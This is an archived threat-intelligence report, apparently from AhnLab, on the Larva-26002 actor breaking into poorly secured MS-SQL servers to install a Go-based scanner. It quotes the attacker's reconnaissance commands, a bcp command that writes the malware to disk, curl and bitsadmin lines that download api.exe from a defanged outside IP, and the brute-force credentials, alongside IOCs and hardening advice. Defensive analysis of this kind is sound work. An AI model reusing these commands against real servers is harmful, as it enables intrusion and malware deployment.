{
	"id": "fba8047c-9fa8-4d73-8b55-72f74a37de9c",
	"created_at": "2026-04-10T03:20:04.762764Z",
	"updated_at": "2026-04-10T03:22:17.891097Z",
	"deleted_at": null,
	"sha1_hash": "0716df33748d37a21d5a7053d5ae39d8c1eb73de",
	"title": "Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud Scanner (Larva-26002)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1255972,
	"plain_text": "Attack Targeting MS‑SQL Servers to Deploy the ICE Cloud\r\nScanner (Larva-26002)\r\nBy ATCP\r\nPublished: 2026-03-19 · Archived: 2026-04-10 02:13:04 UTC\r\nAhnLab SEcurity intelligence Center (ASEC) has confirmed that the Larva-26002 threat actor continues to target\r\nimproperly managed MS-SQL servers in 2026. The Larva-26002 threat actor has distributed Trigona and Mimic\r\nransomware in the past, and has since seized control of infected systems and installed scanners. The latest\r\nconfirmed attack utilizes the ICE Cloud Client, a scanner malware written in Go language.\r\nIn January 2024, the Larva-26002 threat actor attacked MS-SQL servers to install the Trigona and Mimic\r\nransomware [1]. The email address used in the Mimic ransomware is not known from other attack cases, but the\r\nemail address used in the Trigona ransomware matched the email address covered by Palo Alto [2] and Zscaler\r\n[3]. The attack was characterized by the exploitation of the Bulk Copy Program (BCP) utility of MS-SQL servers.\r\nThe threat actor also installed AnyDesk for remote control and a port forwarder for RDP connections. The same\r\nthreat actor continued the attack in 2025, but in addition to AnyDesk, he used Teramind, an RMM tool, and a\r\nscanner built in Rust. [4]\r\nIn 2026, the attacker attacked the same improperly managed MS-SQL server as in the previous case, exploited\r\nBCP to create malware, and finally installed the scanner malware. However, it is characterized by the use of a\r\nscanner named ICE Cloud, which is built in the Go language, and the strings used in ICE Cloud are Turkish,\r\nwhich is also known to have been used by threat actors in the past Mimic ransomware attack. [5]\r\n1. Attacks Against MS-SQL Servers\r\nLarva-26002 attacks MS-SQL servers that are exposed to the outside world and are vulnerable to brute force\r\nattacks or dictionary attacks by setting up simple account information. After a successful attack, it uses the\r\nfollowing commands to collect information about the infected system.\r\n\u003e hostname\r\n\u003e whoami\r\n\u003e ifconfig\r\n\u003e ifconfig /all\r\n\u003e netstat -an\r\n\u003e tasklist\r\n\u003e tasklist /FI “IMAGENAME eq sqlservr.exe” /FO CSV /NH\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 1 of 6\n\nNext, it uses the BCP utility to create malware. For reference, the BCP utility, bcp.exe, is a command line tool\r\nused to import or export large amounts of external data from MS-SQL servers. It is typically used to save large\r\namounts of data stored in a table on a SQL server to a file locally or to export a locally stored data file to a table\r\non a SQL server.\r\nThe threat actor stored the malware in the database and then used BCP to create a file locally. In other words, the\r\nthreat actor exported the malware from the table “uGnzBdZbsi” to the local path using the command as follows,\r\nand “FODsOZKgAU.txt” is a format file that contains formatting information. Note that both “uGnzBdZbsi” and\r\n“FODsOZKgAU.txt” are keywords that have been consistently used since the 2024 attack case.\r\n\u003e bcp “select binaryTable from uGnzBdZbsi” queryout “C:\\ProgramData\\api.exe” -T -f\r\n“C:\\ProgramData\\FODsOZKgAU.txt”\r\nFigure 1. Malware creation exploiting the BCP utility\r\nIn certain environments, instead of using BCP, the scanner malware was downloaded using Curl or Bitsadmin\r\ntools and PowerShell.\r\n\u003e curl -o “C:\\programdata\\api.exe” “hxxp://109.205.211[.]13/api.exe”\r\n\u003e bitsadmin /transfer job1 /download /priority high “hxxp://109.205.211[.]13/api.exe” “C:\\programdata\\api.exe”\r\nFigure 2. Scanner malware download using PowerShell\r\nThe api.exe file created through BCP, Curl, or Bitsadmin is a downloader that installs a piece of malware named\r\n‘ICE Cloud Client.’ This malware functions as both a scanner and a brute‑force tool, is developed in Go, and is\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 2 of 6\n\nlabeled ‘ICE Cloud Launcher.’ When executed with the “-show9” argument, it outputs the following execution\r\nlog.\r\nFigure 3. ICE Cloud Launcher execution log\r\nICE Cloud Launcher authenticates by sending the following packet to the C\u0026C server and then sends a download\r\nrequest to download the scanner, “ICE Cloud Client”. The downloaded “ICE Cloud Client” is created with a\r\nrandom name disguising a legitimate program in the same path.\r\nFigure 4. Authentication process with C\u0026C server\r\nThe “ICE Cloud Client” is also written in Go language and is actually responsible for scanning the MS-SQL\r\nserver. The strings contained in the binary are written in Turkish, and the emoticons used suggest that the author\r\nutilized generative AI. As for the RDP protocol, there is a simple connection test function, but the scanning\r\ncommand does not seem to be supported yet.\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 3 of 6\n\nFigure 5. Turkish string and emoji\r\nFigure 6. ICE Cloud Client execution log\r\nAfter authenticating with the C\u0026C server, the scanner proceeds with the registration process, according to which\r\nthe server sends a list of addresses of pre-attack MS-SQL servers. It also sends the scanning target protocol\r\n“mssql” and ID/PW “ecomm/ecomm” along with the string “TASK”. the scanner tries to authenticate to MS-SQL\r\nwith the ID/PW sent to the scanning target address and sends the successful result to the C\u0026C server.\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 4 of 6\n\nFigure 7. Scanning data received from C\u0026C server\r\n3. Conclusion\r\nAttacks against MS-SQL servers typically include brute force attacks and dictionary attacks against systems that\r\nimproperly manage account information. Administrators should protect their database servers from brute force\r\nattacks and dictionary attacks by using hard-to-guess account passwords and changing them regularly.\r\nIt is also important to update V3 to the latest version to prevent malware infection in advance. In addition, for\r\ndatabase servers that are exposed to the internet, access must be controlled using security solutions such as\r\nfirewalls to block external attackers. If these measures are not implemented beforehand, continuous infections\r\nmay occur through attackers or malware.\r\nMD5\r\n0a9f2e2ff98e9f19428da79680e80b77\r\n28847cb6859b8239f59cbf2b8f194770\r\n5200410ec674184707b731b697154522\r\n7fbbf16256c7c89d952fee47b70ea759\r\n89bf428b2d9214a66e2ea78623e8b5c9\r\nAdditional IOCs are available on AhnLab TIP.\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 5 of 6\n\nURL\r\nhttp[:]//109[.]205[.]211[.]13/api[.]exe\r\nAdditional IOCs are available on AhnLab TIP.\r\nFQDN\r\nhostroids[.]com\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/92988/\r\nhttps://asec.ahnlab.com/en/92988/\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://asec.ahnlab.com/en/92988/"
	],
	"report_names": [
		"92988"
	],
	"threat_actors": [],
	"ts_created_at": 1775791204,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0716df33748d37a21d5a7053d5ae39d8c1eb73de.pdf",
		"text": "https://archive.orkl.eu/0716df33748d37a21d5a7053d5ae39d8c1eb73de.txt",
		"img": "https://archive.orkl.eu/0716df33748d37a21d5a7053d5ae39d8c1eb73de.jpg"
	}
}